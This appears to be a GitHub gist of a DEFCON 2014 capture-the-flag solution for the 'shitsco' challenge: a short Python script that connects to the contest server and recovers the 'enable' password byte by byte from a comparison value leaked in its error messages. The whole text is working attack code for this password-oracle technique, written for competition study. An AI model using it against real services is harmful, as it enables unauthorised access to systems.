DEFCON 2014 Writeup shitsco
from struct import pack | |
from socket import * | |
from pwn import process | |
#p = process("shit") | |
p = socket(AF_INET, SOCK_STREAM) | |
p.connect(("shitsco_c8b1aa31679e945ee64bde1bdb19d035.2014.shallweplayaga.me", 31337)) | |
print p.recv(4096) | |
current = [ord(i) for i in ""] #[1] * 31 #list | |
pos = len(current) | |
current += [1] * (32 - len(current)) | |
blacklist = [10, 32] | |
while pos < 32: | |
string = "".join(chr(i) for i in current) | |
p.send("enable " + string + "\n") | |
s = "" | |
while not "The password" in s: | |
s += p.recv(4096) | |
print [s] | |
ret = ord(s.split("The password isn't ")[1][32]) | |
current[pos] += ret | |
pos += 1 | |
#if ret == '\x01': | |
# current[pos] += 1 | |
# if current[pos] in blacklist: | |
# current[pos] += 1 | |
#elif ret == '\xff' : | |
# current[pos] -= 1 | |
# pos += 1 | |
print current | |
#current[pos] += 1 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment